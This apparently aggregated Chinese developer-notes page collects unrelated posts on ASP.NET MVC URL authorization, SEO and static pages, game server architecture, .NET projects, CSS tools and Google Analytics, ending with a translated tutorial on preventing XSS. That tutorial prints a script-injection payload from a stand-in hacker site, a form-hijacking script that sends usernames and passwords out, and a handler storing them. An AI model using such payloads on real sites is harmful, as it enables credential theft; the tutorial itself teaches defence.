开发笔记 第774页

本示例演示了在ASP.NET MVC中进行基于URL的权限控制，由于是基于URL进行控制的，所以只能精确到页。这种权限控制的优点是可以在已有的项目上改动极少的代码来增加权限控 制功能，和项目本身的耦合度低，并且实现起来也比较简单。缺点是权限控制不够精确，不能具体到某一具体的按钮或者某一功能。

在数据库中新建2个表。PermissionItem表用于保存权限ID和页面路径的关系，一个权限ID可以有多个页面，一般同一个权限ID下的页面是为了实现同一个功能。PermissionList表用于保存用户所具有的权限。

Code
USE [UrlAuthorize]
GO
/****** Object:  Table [dbo].[PermissionList]    Script Date: 07/07/2009 00:07:10 ******/
SET ANSI_NULLS ON
GO
SET QUOTED_IDENTIFIER ON
GO
Create TABLE [dbo].[PermissionList](
    [ID] [int] IDENTITY(1,1) NOT NULL,
    [PermissionID] [int] NOT NULL,
    [UserID] [int] NOT NULL,
 CONSTRAINT [PK_PermissionList] PRIMARY KEY CLUSTERED 
(
    [ID] ASC
)WITH (PAD_INDEX  = OFF, STATISTICS_NORECOMPUTE  = OFF, IGNORE_DUP_KEY = OFF, ALLOW_ROW_LOCKS  = ON, ALLOW_PAGE_LOCKS  = ON) ON [PRIMARY]
) ON [PRIMARY]
GO
SET IDENTITY_Insert [dbo].[PermissionList] ON
Insert [dbo].[PermissionList] ([ID], [PermissionID], [UserID]) VALUES (1, 2, 1)
Insert [dbo].[PermissionList] ([ID], [PermissionID], [UserID]) VALUES (2, 3, 1)
SET IDENTITY_Insert [dbo].[PermissionList] OFF
/****** Object:  Table [dbo].[PermissionItem]    Script Date: 07/07/2009 00:07:10 ******/
SET ANSI_NULLS ON
GO
SET QUOTED_IDENTIFIER ON
GO
SET ANSI_PADDING ON
GO
Create TABLE [dbo].[PermissionItem](
    [ID] [int] IDENTITY(1,1) NOT NULL,
    [PermissionID] [int] NOT NULL,
    [Name] [nvarchar](50) NOT NULL,
    [Route] [varchar](100) NOT NULL,
 CONSTRAINT [PK_PermissionItem] PRIMARY KEY CLUSTERED 
(
    [ID] ASC
)WITH (PAD_INDEX  = OFF, STATISTICS_NORECOMPUTE  = OFF, IGNORE_DUP_KEY = OFF, ALLOW_ROW_LOCKS  = ON, ALLOW_PAGE_LOCKS  = ON) ON [PRIMARY]
) ON [PRIMARY]
GO
SET ANSI_PADDING OFF
GO
SET IDENTITY_Insert [dbo].[PermissionItem] ON
Insert [dbo].[PermissionItem] ([ID], [PermissionID], [Name], [Route]) VALUES (1, 1, N'测试页1', N'/Test/Page1')
Insert [dbo].[PermissionItem] ([ID], [PermissionID], [Name], [Route]) VALUES (2, 2, N'测试页2', N'/Test/Page2')
Insert [dbo].[PermissionItem] ([ID], [PermissionID], [Name], [Route]) VALUES (3, 3, N'测试页3', N'/Test/Page3')
Insert [dbo].[PermissionItem] ([ID], [PermissionID], [Name], [Route]) VALUES (5, 1, N'测试页4', N'/Test/Page4')
Insert [dbo].[PermissionItem] ([ID], [PermissionID], [Name], [Route]) VALUES (6, 2, N'测试页5', N'/Test/Page5')
SET IDENTITY_Insert [dbo].[PermissionItem] OFF

数据库中的示例表示Page1和Page4同属于权限1，Page2和Page5同属于权限2，Page3属于权限3。用户ID为1的用户具有权限2和3。

在ASP.NET MVC项目中新建一个AccountHelper类，这是一个辅助类。GetPermissionItems方法用于获取权限ID和页面路径的对应关系。 这是全局的，并且每个用户在访问页面时都会用到这些信息，所以存入Cache中。数据库的相关操作这里使用的是ADO.NET Entity Framework。

 1/**//// <summary>
 2/// 获取权限项
 3/// </summary>
 4/// <returns>权限项列表</returns>
 5public static List<PermissionItem> GetPermissionItems()
 6{
 7     // 如果缓存中已经存在权限列表信息，则直接从缓存中读取。
 8      if (HttpContext.Current.Cache["PermissionItems"] == null)
 9     {
10          // 如果缓存中没有权限列表信息，则从数据库获取并写入缓存
11           UrlAuthorizeEntities db = new UrlAuthorizeEntities();
12          var items = db.PermissionItem.Where(c => c.PermissionID > 0).ToList();
13          HttpContext.Current.Cache["PermissionItems"] = items;
14     }
15
16     // 这个缓存中保存了所有需要进行权限控制的页面所对应的权限ID
17     return (List<PermissionItem>)HttpContext.Current.Cache["PermissionItems"];
18}
19

GetUserPermission方法是将用户所具有的权限ID保存到一个一维Int32数组中。这个信息每个用户是不同的，但是会经常使用到，所以存入Session。

 1/**//// <summary>
 2/// 获取用户权限
 3/// </summary>
 4/// <param name="userID">用户ID</param>
 5/// <returns>用户权限数组</returns>
 6public static Int32[] GetUserPermission(int userID)
 7{
 8    // 如果缓存中已经存在权限列表信息，则直接从缓存中读取。
 9    if (HttpContext.Current.Session["Permission"] == null)
10    {
11        // 从数据库获取用户权限并将权限ID放到int数组并存入Session
12        UrlAuthorizeEntities db = new UrlAuthorizeEntities();
13        var permissions = db.PermissionList.Where(c => c.UserID == userID).Select(c=>c.PermissionID).ToArray();
14        HttpContext.Current.Session["Permission"] = permissions;
15    }
16    return (Int32[])HttpContext.Current.Session["Permission"];
17}
18

再新建一个UrlAuthorizeAttribute类，继承自AuthorizeAttribute，这是一个Filter。我们重写它的OnAuthorization方法，以在ASP.NET页生命周期身份验证阶段执行它。

 1/**//// <summary>
 2/// 重写OnAuthorization
 3/// </summary>
 4/// <param name="filterContext"></param>
 5public override void OnAuthorization(AuthorizationContext filterContext)
 6{
 7    // 获取权限项列表
 8    List<PermissionItem> pItems = AccountHelper.GetPermissionItems();
 9
10    // 获取当前访问页面对应的权限ID。如果item为空则表示当前页面没有权限控制信息，不需要进行权限控制
11    var item = pItems.FirstOrDefault(c => c.Route == filterContext.HttpContext.Request.Path);
12
13    if (item != null)
14    {
15        if (Array.IndexOf<Int32>(AccountHelper.GetUserPermission(int.Parse(filterContext.HttpContext.Session["UserID"].ToString())), item.PermissionID) == –1)
16        {
17            // 提示权限不够，也可以跳转到其他页面
18            filterContext.HttpContext.Response.Write("没有权限访问该页面");
19            filterContext.HttpContext.Response.End();
20        }
21    }
22    else
23    {
24        // 如果权限项列表中不存在当前页面对应的权限ID则所有用户都不允许访问，直接提示无权访问。***注1***
25        filterContext.HttpContext.Response.Write("没有权限访问该页面");
26        filterContext.HttpContext.Response.End();
27    }
28}
29

至此，主要的工作都已经完成了的。接下来我们只需要在需要进行权限控制的Action或Controller前加上[UrlAuthorize]， 这些Action或Controller中的所有Actions就会自动被UrlAuthorize这个Filter进行处理。如果某一个Action被 标上了[UrlAuthorize]，而数据库中又不存在该页面对应的权限ID，那么根据示例的代码，所有用户都将无法访问这个页面，如果需要更改这个设 置，可以修改上面“注1”下面的2行代码。

示例代码下载

　　前一篇讨论“静态页”的文章反响不错，不少朋友发表了自己的看法，也给老赵更多的想法。虽然也在前一篇文章后面回复了不少内容，但是就以往经验来看，总结为一篇新的文章会让我想表达的内容更为明确，对于“静态化”这一非常容易被人误解的概念来说也是非常重要的。

　 　我们还是先来讨论一下，什么叫做“静态页”。有朋友说，放在硬盘上的htm或html文件便是一种静态页，Web服务器不需要做额外的处理，直接读取文 件内容并输出就可以了，而这样的静态文件对于SEO是有帮助的。至于理由，是搜索引擎会对html结尾的文件给更好的权值（这好像还是结论，不是理由）， 而这是“常识”，“了解一点SEO的人都知道这个”，“人们普遍在使用的做法”，因此“它一定是正确的”。不过其实Google并不这么认为，百度倒没有给出专业说法。

　 　当然，我们已经重复强调，但还是需要不断明确的一点是，即使搜索引擎对于“静态页”有更好的倾向性，那也是因为其“URL样式”，而不是“在硬盘上放置 了一个html文件”。请求方（也就是爬虫）只是向服务器端发送一个URL，并获取服务器端给出的内容。它不会关心，也无法了解服务器端究竟是如何得到页 面内容的，对于客户端来说，世界上没有“静态”或“动态”页面之分。有些朋友可能还是会说“不会啊，html就是静态页面，像aspx之类的就是动态页 面，前者不需要在Web服务器上运算，后者需要”。

　　真是这样的吗？并非如此，因为html文件也是需要Web服务器来运算的。例如，您请求一个html文件，Web服务器至少做了几件事情：

• 如果请求包含缓存信息，那么处理缓存状态。
• 根据URL定位到磁盘上的文件。
• 进行用户认证和授权（如，是否匿名？）。
• 判断是否有权限读取。
• 读取文件。
• 根据文件类型设置MIME的值。
• 根据文件最后修改日期设置Last-Modified值。
• 根据文件内容及其他状态设置其E-Tag值。
• 如果文件内部有include标记，那么读取另一个文件填充进来。

　 　看看，处理一个文件需要多少“动态运算”啊，这些可都是在Web服务器（如IIS）加载一个html所做的事情。如果您想要观察这些过程，可以阅读一些 Web服务器的源代码，或者去观察一下ASP.NET中System.Web.StaticFileHandler类所做的事情，它也体现了Web服务器 处理html时的关键之处。事实上，如果您在IIS中将html配置给ASP.NET ISAPI的话，或者使用VS自带的Web服务器，最后便是由StaticFileHandler来输出硬盘上的文件的。

　　所以，虽然 我们看起来Web服务器只是简单地读取了硬盘上的文件，但其实它还是不如我们想象的那么简单。不过对于客户端来说，这一切都是不可知的。例如 Squid，Nginx这样部署在前端的缓存或反向代理服务器，它们都不会关心后端Web服务器是Windows，Linux还是Unix，也不会关心是 IIS，Apache，Lightted甚至是我们自己写的高效或低劣的Web服务器。对于浏览器，爬虫，或前端负载均衡器来说，它们只知道TCP/IP 协议，它们只知道HTTP协议等东西，其他一概不知。

　　不过，也有朋友坚持认为“生成静态页”来“进行页面缓存”对SEO有帮助。理由 是，“进行页面缓存”能够提高网站性能，爬虫更倾向于访问速度更快的页面。从这个角度看来，这种说法的确有一定道理。只是我还是不喜欢这样的看法，因为这 种说法没有把握事物关键。在这里，SEO的关键在于优化网站性能，而生成静态页只是一种手段之一。这并不是适用性最广的，也并非是最容易实现的。如果您直 接把“生成静态页”与“SEO”联系起来，很有可能会对他人造成误解。

　　当然，如果您的思路没有问题，“静态页”三个字的指代也足够明 确，“静态页有利于SEO”这个命题毫无疑问是正确的。不过我们现在并没有讨论一个命题的逻辑是否正确，我们也不必纠缠于一个表达形式是否严谨，我们的目 的是要说明道理。也正因为如此，老赵才会一遍一遍地写这么多内容。也就是说，这几篇文章的关键在于“说清道理”，我们把握它既可。

　　最后，老赵再谈一下对SEO这个工作的看法。

　 　从老赵与各SEO人员的接触感觉来看，他们总是有各种理由来说明“问题所在”，只是如果在改进问题之后还是没有效果的话，他们又可以找出各种理由来告诉 你为什么没有效果——但是要知道SEO是一个实践性工作，它的唯一判断依据便是“效果”，而不是“理论”。SEO的理论很容易掌握，但是如果无法真切提高 一个网站在搜索引擎上的表现，这一切还是白搭。老赵认为，一个好的SEO是需要了解网页制作，或者说网站开发的基本技术的，至少要有常识，否则基本上就是 在扯蛋。老赵曾经接触过一个“专业”的SEO公司，那里的“SEO咨询师”给我留下了深刻的印象——负面印象。其“非专业性”从以下几个事件中便可见一 斑：

1. 还是“静态页”的问题。由于把URL变为.html结尾之后并没有得到明显的效果，他询问我们的实现方式。在得知我们使 用了URL重写，而不是在硬盘上放置html文件时他“惊呼”这种欺骗搜索引擎的行为是会起到反效果的。他强烈要求我们在硬盘上放置html文件。这个要 求自然遭到了我们的拒绝，原因之一是我们是非常动态的网站，很难实现这个需求，但是更重要的是，懂得一点技术的人就知道，Web服务器的处理方式对于搜索 引擎爬虫时完全不可见的，我们是否真正放置html文件与搜索引擎没有任何关系。
2. 内容的位置问题。在SEO界有种说法是，搜索引擎 会更倾向于把页面靠前的内容看的更重，而把页面靠后的内容权值放低。因此那位专业SEO咨询师指着我们的某张页面说，这部分内容太靠“下方”，很容易被搜 索引擎忽略。请注意，他说的是“内容在页面显示的时候出现在下方”。您觉得这种说法有道理吗？如今页面布局往往使用XHTML+CSS的方式，而搜索引擎 只会关注HTML的内容，而“位置”很大程度上是由CSS，甚至是由JS来控制的。出现在HTML内容前段的内容，在页面呈现时也可以出现在下方，这也和 搜索引擎没有任何关系。可惜这一点也解释了半天。
3. 最后一条可以说是最可笑的。因为SEO效果不好，那位SEO咨询师觉得只能“来真 的”了，于是向我们索要网站的IIS日志。分析日志对于SEO有些帮助，因为可以看出爬虫的抓取顺序，频率，甚至结果等等，因此查看日志的做法本没有问 题。可惜问题在于，对方从MSN上给出一个邮箱，让我们把过去几个星期的日志发给他。当看到这个要求的时候，老赵几乎要破口大骂。从这点可以看出，这位 SEO咨询师缺少必要的尝试，他根本不知道一个中小型的网站，每天便要生成几百兆到几个G的日志。如此没有常识，为什么会有那么多“成功案例”？

　 　老赵的博客（也就是您正在看的这个）在搜索引擎上的表现也非常糟糕，即使是老赵经常写作的话题，在Google上也很难找到几篇文章，排名也不太靠前。 如果不使用site:cnblogs.com进行限制的话，几乎没有一篇文章是找到我的blog，都是各种地方的转载。为此我也比较苦恼，咨询了一些专业 搞SEO的朋友，做出一些修改之后还是没有太大改善。不过我相信那只是我没有遇上优秀的SEO人员而已，我的博客的潜力还远没有挖掘到底。

　　如果您是一个专业的SEO人员，或者是专业的SEO公司，不妨给我一些建议——如果可以的话，我也不介意在这方面进行一点投资。不过，如果是一些“肮脏”的优化方式就不必了，例如去论坛上贴链接，发垃圾邮件。我也知道这些做法很有效果，但是我不想这样做。

Five Minutes 公司程延辉（小名康天） 介绍开心农场架构，social game的技术挑战，支持千万级DAU的social game技术架构。这是一个对于开发者来说，非常精彩，非常有实用性指导的一次演讲，详细介绍了很多技术内幕。
>>猛击这里下载演讲ppt<<

Five Minutes 公司的著名social game 开心农场，目前非常受用户欢迎，包括国外的Facebook，国内的开心网都是如此，是全球最大的social game，台下热烈掌声。呵呵。开心农场这个游戏从介绍看，相当成功，最早是08年9月在xiaonei上线，而后在51等平台推广，包括 Facebook。现在已经有1570万游戏用户了，其中包括50万的Facebook用户。
开心农场架构主要难点：1。如何存储大规模的用户数据千万级2。如果应对大量访问每天数亿请求量3。如果应对数据的频繁修改，每秒数万次数据修改。
解决的方式
优化：
1。负载均衡，web服务器平行扩展。
2。服务器性能优化。
3。异步处理，缓存数据接口，Linux内核参数优化，挖掘PHP的效率，用fastcgi模式运行php，用EAccelerator加速。固定不变数据做成php配置文件，用C开发PHP扩展等。
数据库性能优化：
1。数据库分库分表，所有数据全部设计成 key－》value形式，不用join。
2。使用INNODB，经常操作的数据表中所有字段尽量设计成数值型，用update替代Insert和Delete操作
异步处理：整个系统最关键的部分，
原则：把客户端暂时不需要的数据进行异步处理。
实例：讲非核心数据先写入memcached，异步更新到数据库，合并数据库更新操作，Feed和Notification的异步发送。
利用客户端资源：Flash屏蔽重复操作和不必要请求，Flash进行一些计算减轻服务器的复旦，例如好友排序等。Flash缓存一些数据。
social game ＝ social ＋ game。实时互动（大负载）和非实时互动（大负载）。
服务器角色：场景服务器，逻辑服务器，admin服务器，gateway，架构逻辑还是挺复杂的，每天处理亿级请求的架构，完全和百万级不一样！完全能够通过平行扩展的方式应对，gateway和场景服务器都完全可以增加。
Blue Whale是他们们正在开发的解决长连接的social game架构。

• Social-_Game.zip (207 KB)
• 下载次数: 1366

• 查看图片附件

Eric Nelson是微软技术的传道者，也是MSDN UK Flash的技术编辑，他编写了一个列表，列出23个UK开发人员推荐的.NET开源项目。微软的一些开源项目如ASP.NET MVC、DLR、IronRuby、IronPython、MEF等则未列入其中。

Eric尝试只包含一个测试框架和一个mock框架，即使有很多其它的项目同样入围。他列出了以下项目：

1. [TEST] xUnit.net – 用于TDD的最好的测试框架之一。
2. [TEST] RhinoMocks mocking framework – 通过创建mock使测试更简单。
3. [TEST] White for automation of Windows applications – 用代码驱动Windows程序来测试。
4. [TEST] Gallio Automation Platform – 可以运行很多测试框架，如MSTest、xUnit、NUnit以及MbUnit。
5. [DATA] Fluent NHibernate – Fluent NHibernate让你可以用C#代码来设置映射关系。
6. [OOP] StructureMap Dependency Injection/Inversion of Control – 解耦类和依赖。
7. [OOP] Managed Extensibility Framework – 从静态编译程序转换到动态语言程序
8. [APPFX] s#arp architecture for web applications – 用ASP.NET MVC和NHibernate快速开发web应用程序。
9. [APPFX] OpenRasta REST based framework for building web applications – 让你的程序拥有一个REST API接口。
10. [APPFX] CSLA.NET Application Framework – .NET开发综合框架
11. [APPFX] Spring.NET Application Framework – Web开发综合框架
12. [RUNTIME] Mono enables .NET on Linux and Mac – 在Linux、BSD和OS X上使用.NET.
13. [UTIL] Sandcastle Help File Builder – 创建MSDN样式的文档。
14. [HELPER] EasyHook for Windows API Hooking – 用托管代码扩展非托管代码。
15. [HELPER] Json.NET for working with JSON formatted data – 用一条语句序列化.NET对象。
16. [HELPER] Excel Data Reader for Excel 97 to 2007 – 将Excel文件读取到Dataset中
17. [HELPER] #SNMP Library – 对SNMP的包装。
18. [HELPER] DotNetZip Library – ZIP库和示例。
19. [HELPER] Visio Automation Library – 用C#、VB和其它语言驱动Viso
20. [HELPER] PHPExcel is not just about Excel! – 读写Execel 2007、PDF、HTML等文档的PHP类
21. [HELPER] Argotic Syndication Framework for RSS, Atom, OPML and more – 读写聚合内容的库
22. [HELPER] NLog logging library -让你的程序易于调试
23. A great directory of C# Open Source software – 一个非常好的库、框架和工具列表

还有一些提交的项目没有进入列表：

• Castle
• MvcContrib
• Subversion
• Nant
• log4net
• Lucene
• CruiseControl
• MEF
• Paint.NET

一些使用MS-PL许可证的微软项目:

• ASP.NET MVC Open Source
• .NET Dynamic Language Runtime (DLR)
• IronRuby
• IronPython
• Silverlight Toolkit
• Ajax Control Toolkit
• Managed Extensibility Framework (MEF)

MS-PL是OSI认可的许可证，GNU也认可它为免费软件许可证，它允许任何人查看源代码、修改源代码并发布修改后的源代码。而且此许可证并不限 制代码只能运行在Windows上，这样就可以将代码移植到其它操作系统，例如Mono（Linux上的.NET）和Monolight（Linux上的 Silverlight）。MonoDevelop有一个插件，可以用来在Linux和Mac OS X上开发ASP.NET MVC程序。

查看英文原文：23 .NET Open Source Projects

现在的互联网上已经有很多能帮助设计师们的各种在线生成器，比如:图标(icon)生成器、背景生成器、按钮生成器和标志生成器等。Balkhis曾经为我们写过一片很不错的关于各种实用的在线生成器的文章。

如果没有这些在线的生成器，设计师们可能就要浪费很多精力在重复性的工作中了。今天彬Go将向大家分享一系列(15款)CSS网格布局生成器。如果大家不了解CSS网格布局的话，可以先看看彬Go之前的文章《960网格系统》、《使用Photoshop+960 Grid System模板进行网页设计》、《960 Grid System 基本原理及使用方法》

1.网格布局生成器 By Pagecolumn

2.网格生成器 By DesignByGrid

3.Blueprint CSS网格生成器

4.网格生成器 by netProtozo

5.Grid Designer (featured in Creative Review magazine)

6.网格系统生成器

7.YUI CSS 网格生成器

8.Variable Grid System

9.YAML 生成器

10.布局生成器 by Pagecolumn

11.Fisheye

12.CSS 布局生成器 by CSSCreator

13.Firdamatic

14.支持边框的CSS1~3列页面生成器

15.CSS 布局生成器 by CSSPortal

英文原文:15 Extremely Useful CSS Grid Layout Generator For Web Designers
翻译原文:15款非常有用的前端开发CSS网格(grid system)生成器

当我们用这种方法:Response.Write("<script>window.close()</script>")
总是提示什么:你查看的网页试图关闭的提示
如何去掉提示，直接关闭窗体?
可以用以下方法:
Response.Write("<script>window.opener=null;window.close()</script>")
只有ie6才支持.
opener只要设为任何值都可以,不会出现提示

如果是通过子窗体关闭父窗体时怎么做呢
子窗体（弹出窗体）：
同理可得：
Response.Write("<script>window.opener.top.opener=null;window.opener.top.close()</script>")

大家好，我是owen，主要从事 Online marketing 方面的工作，平时主要专注于 SEM 和 Web analytics。这次很荣幸能够应 Denis 之邀，在我爱水煮鱼抛砖引玉，发表 Web analytics 方面的文章，希望以后能够在这里，与大家多多交流这方面的知识。今天首先给大家简单谈谈豆瓣网怎么应用 Google Analytics。

豆瓣 Google Analytics 代码加载模式

豆瓣从今年开始也加入 Google Analytics 的统计阵营。让我们通过它加载的 Google Analytics 源码，简单分析一下它都是怎么应用的。

我们先从豆瓣的源码来看看它的Google Analytics统计代码

豆瓣 Google Analytics 代码

我们知道一般默认的 Google Analytics代码如下：

默认 Google Analytics 统计代码

两相对比，我们就会发现豆瓣加载 ga.js 的方式与默认的方式有些不太一样，由于豆瓣并没有采用 https 加密访问，所以撇弃了默认的ga.js加载方式。

默认的统计函数，pageTracker 也被豆瓣改成了 _ga ，这个只是名称定义上的区别，并没有什么实质的改变。豆瓣的主要应用是下面两个函数：

使用 _ga._addOrganic 识别非主流搜索引擎

再来看豆瓣比默认 Google Analytics 代码增加的部分，那就是多了数个 _ga._addOrganic ，这是 Google Analytics 添加自定义搜索引擎的代码。尽管 Google Analytics 对于主流的搜索引擎都能自动识别，但毕竟能识别的是国外的主流搜索引擎，在国内，像搜狐的 Sogou，QQ 的 soso，网易的有道等搜索引擎，都不能被 Google Analytics 正确识别，而被当作推荐来源。这时候我们就可以利用_addOrganic 参数来识别这些非主流搜索引擎，如豆瓣的做法。

使用 _addIgnoredOrganic 忽略关键字

除了添加自定义搜索引擎，豆瓣在最后还添加了如下这些代码:

_ga._addIgnoredOrganic("豆瓣");
_ga._addIgnoredOrganic("douban");
_ga._addIgnoredOrganic("豆瓣网");
_ga._addIgnoredOrganic("www.douban.com");

这些代码用来把引号中的关键词从搜索引擎的关键词报告中排除，而当成直接点击量来源。

为什么要这么做？因为一个知名的大网站，来自这些品牌词的搜索流量都非常大，常常是排在前几位的搜索关键词来源，而这通常是因为搜索引擎养成现在的 人都懒得记网址，直接搜索品牌名来记住域名。这些品牌词对于网站的关键词来源分析并没有很直接的帮助，所以在来自品牌词的流量很大的情况下，可以直接把这 些关键词识别成直接点击量来源。

关于自定义 Google Analytics 搜索引擎和排除特定关键词为直接点击量来源的语法，可以参考 Google Code 上关于这方面的详细介绍。

通过 _setVar 识别用户

当我们登录豆瓣后，再来分析豆瓣的源码，会发现多了一个ga._setVar(”xxxx”)的 Google Analytics 参数。

豆瓣使用 Google Analytics 的._setVar参数来跟踪登录用户行为

_setVar() 函数是 Google Analytics 的用户定义函数，主要用于对特定来源的用户行为进行分类，例如可以对登录浏览的用户设置一个数值，然后在 Google Analytics 后台的访问者/用户定义 中查看其浏览属性。

Google Analytics 访问者/用户定义报告

分析豆瓣的源码可以知道，豆瓣对每一个登录后的用户，都赋以一个专门的 id 值，这样可以在用户定义报告里，看到整体的登录用户访问行为，乃至每个登录用户的浏览行为。通过这样设定后，豆瓣便可以轻易获取高忠诚度访问用户的访问行为。关于_setVar()的更多说明，请参阅 Google Analytics的技术文档

如何根据访问者在我的网站上访问的页面或在表单上做出的响应对其进行分类？在 Google Analytics 官方的帮助文件，也给出了另外一个应用案例

值得注意的是，原来在设置 _setVar() 函数的时候，整个网站的跳出率会出现重大的偏差，不过在最近的google analytics官方博客，指出该bug已经修正，客户在进行这方面设置的时候，还是要注意对比前后数据是否有重大偏差。

通过 _trackPageview 区分不同类型的评论

豆瓣上的书评，影评和乐评可以说是豆瓣网站的核心价值所在。一般评论的URL格式如下：

豆瓣上单条评论的URL

当我们查看该页面的网页源代码时，会发现有趣的现象:

豆瓣单条评论页的 Google Analytics 代码

我们知道，一般 Google Analytics 的_trackPageview() 括弧中的参数是留空的， Google Analytics 会自动捕获网址的 URL 参数，如果在 _trackPageview()括弧中输入特定的数值，那么在 Google Analytics 的报表中，URL 将是我们指定的参数，而不再是我们在地址栏看到的 URL。

如上面的例子，我们在 Google Analytics 中看到的URL将是/book/review/1946018/，而不再是我们在浏览器地址栏看到的/review/1946018/

当所在频道是电影或者音乐时，_trackPageview() 中的参数将根据所在频道的属性，变为/movie/xxxxx 或者 /music/xxxxx的数值。

豆瓣通过对的参数进行重新指定，主要有以下的好处：

保证了用户和搜索引擎看到的 URL 比较简短，达到 URL 对用户友好和对搜索引擎友好的目的；而在 Google Analytics 报告中，通过 内容/内容细目/ 报告，又能了解到各个频道总的浏览情况。

在GA的内容细目报告中，将会多出 /book/ /music/ /movie/ 这样的文件夹来，总而获得各个频道的合计浏览数据。

而如果只是使用默认 _trackPageview()，你将只能得到所有评论页面的浏览数据，而无法得到细分的各个频道的浏览数据。

关于_trackPageview()的具体的使用方法可参照 Google Code 的说明

注意事项:使用 _trackPageview() 参数重新指定 URL 之后，网站覆盖图的数据将受到影响。可参阅 Google Analytics 的官方帮助文件

除了豆瓣使用 _trackPageview() 来对URL进行重写，大众点评网也采用了类似的做法（应该是比豆瓣更早采用。。。因为是我在点评网任职时候实验的做法;那时候豆瓣还没有使用 Google Analytis 统计代码，呵呵），有兴趣的同学可以自己去研究点评的 Google Analytis 代码。

作者：owen
原文链接：浅析豆瓣的 Google Analytics 应用

System.Web.HttpUtility.UrlEncode("中文",System.Text.Encoding.UTF8);

原文地址：http://weblogs.asp.net/stephenwalther/archive/2008/06/23/asp-net-mvc-tip-7-prevent-javascript-injection-attacks-with-html-encode.aspx

摘要：在这个Tip中，你将了解到JavaScript注入攻击可能会比你想象的更加严重。Stephen Walther展示了如何使用JavaScript注入攻击来在一个ASP.NET MVC站点上干些大大的坏事，并解释了如何通过一种简单的方式来防止这种攻击。

当你从站点的浏览者那里收集表单数据，并将表单数据展示给其他浏览者时，你应该对表单数据进行编码。否则，你的站点大门将为JavaScript注入攻击打开。

例如，如果你创建了一个论坛，在将消息显示到Web页面之前，请确保对其进行了编码。如果你没有对消息进行编码，某些人可能会发表一个带JavaScript的消息，做一件大大的坏事。 

在这个Tip中，我将强调黑客可以利用JavaScript注入攻击 做非常严重的事情。让我惊奇的是，关心防止JavaScript注入攻击的Web开发者少之又少。这里的问题在于很多开发者并没有完全意识到这其中的危 险。他们认为使用JavaScript注入攻击最坏的情况也就是破坏页面结构。在这个Tip中，我将向你展示黑客如何利用JavaScript注入攻击来 盗取网站用户的用户名和密码。本文的要点是通过恐吓来教会你做正确的事情。

据Wikipedia称，JavaScript注入攻击已经“超越缓冲区溢出，成为最常见的公共安全弱点。”更恐怖的是，据Wikipedia称，70%的网站向JavaScript注入攻击敞开着（http://en.wikipedia.org/wiki/Cross-site_scripting）。因此，本文读者，你们当中的70%正在犯懒并危害着你们网站的用户。羞羞！

如何通过JavaScript盗取另一个用户的密码

这里介绍一下黑客如何利用JavaScript注入攻击做大大的坏事。假设你建立了一个Customer Survey应用程序，使用的是ASP.NET MVC。

Customer Survey应用程序是一个超级简单的应用程序。用户通过在一个表单中填写内容，可以对一个产品进行反馈。客户可以查看之前所有客户留下的反馈。

图1展示了反馈表单。

图1 – 反馈表单

注意反馈表单页面的顶部还包含了一个登录表单。Customer Survey应用程序将登录表单放到了母版页中（Web站点的常见场景）。

由于反馈表单显示了其它客户留下的反馈，该页面将对JavaScript注入攻击敞开大门。那些心怀恶意的黑客只需在反馈表单中敲入下面的代码：

<script src=http://HackerSite.com/EvilScript.js></script>

当该文本重新显示在反馈表单页中时，<script>标签会调用一个位于黑客的站点上的JavaScript脚本。该脚本如清单1所示。

清单1 – EvilScript.js

 1if (window.attachEvent)
 2     document.forms[0].attachEvent('onsubmit', fn);
 3 
 4function fn(e)
 5{
 6     var userName = document.getElementById("userName").value;
 7     var password = document.getElementById("password").value;
 8     var d = new Date();
 9     var url = "HackerSite/EvilHandler.ashx?userName=" + userName 
10        + "&password=" + password + "&d=" + d.valueOf();
11 
12     var script = document.createElement("script");
13     script.type = 'text/javascript';
14     script.src = url;
15     document.body.appendChild( script ); 
16}

清单1中的脚本将一个事件处理器附加到了登录表单的form submit事件上。当登录表单提交时，会执行fn() JavaScript函数。该函数截取了表单中的userName和password字段。接下来，该脚本向页面中动态注入了一 个<script>标签，并将userName和password传递给一个名为EvilHandler.ashx的（可能是远程的）处理 器。

EvilHandler的代码如清单2所示。EvilHandler简单地从查询字符串中拿到了用户名和密码，并存放在数据库中。

清单2 – EvilHandler.ashx

 1using System;
 2using System.Collections;
 3using System.Data;
 4using System.Linq;
 5using System.Web;
 6using System.Web.Services;
 7using System.Web.Services.Protocols;
 8using System.Xml.Linq;
 9 
10namespace CustomerSurvey.HackerSite
11{
12     [WebService(Namespace = "http://tempuri.org/")]
13     [WebServiceBinding(ConformsTo = WsiProfiles.BasicProfile1_1)]
14     public class EvilHandler : IHttpHandler
15     {
16 
17         public void ProcessRequest(HttpContext context)
18         {
19             // Get user name and password from URL
20             string userName = context.Request.QueryString["userName"];
21             string password = context.Request.QueryString["password"];
22             
23             // Store in database
24             HackerDataContext db = new HackerDataContext();
25             StolenPassword pwd = new StolenPassword();
26             pwd.userName = userName;
27             pwd.password = password;
28             db.StolenPasswords.InsertOnSubmit(pwd);
29             db.SubmitChanges();
30         }
31 
32         public bool IsReusable
33         {
34             get
35             {
36                 return false;
37             }
38         }
39     }
40}

假设这个Customer Feedback表单出现在一个银行网站中。在这种情况下，黑客现在就能访问任何人的帐户信息了，并能把任何人的钱转到位于开曼群岛的帐户中。很不错，才需要这么几行代码。

ASP.NET MVC不支持请求验证

这种危险在ASP.NET MVC应用程序中更为敏感一些。在ASP.NET Web Forms应用程序中——和ASP.NET MVC不同——你可以依赖一项称作请求验证（Request Validation）的特性。如果从一个页面提交的表单数据中含有看起来不安全的文字，请求验证就能检测到。如果你提交的表单数据中包含诸如尖括号这样 的文本，就会导致异常的抛出。

要知道ASP.NET MVC并不适用请求验证。在ASP.NET MVC应用程序中，你必须完全由自己来防止JavaScript注入攻击。

防止JavaScript注入攻击

防止JavaScript注入攻击其实很简单。确保每当你在视图中显示从用户那里获取的表单数据时都调用了Html.Encode()即可。

例如，下面是Index视图中用于显示用户反馈的部分代码：

 1<h1>Customer Feedback</h1>
 2<ul>
 3<% foreach (Survey survey in ViewData.Model)
 4   { %>
 5   <li>
 6    <%= survey.EntryDate.ToShortDateString() %>
 7    &mdash;
 8    <%= survey.Feedback %>
 9   </li>
10<% } %>
11</ul>

该代码包含一个循环，遍历了Suvey实体。为每个Survey实体显示了Feedback和EntryDate属性。

为了防止JavaScript注入攻击，你需要使用Html.Encode()辅助方法。下面是循环代码的正确编写方式：

 1<h1>Customer Feedback</h1>
 2<ul>
 3<% foreach (Survey survey in ViewData.Model)
 4    { %>
 5    <li>
 6     <%= survey.EntryDate.ToShortDateString() %>
 7     &mdash;
 8     <%= Html.Encode(survey.Feedback) %>
 9    </li>
10<% } %>
11</ul>

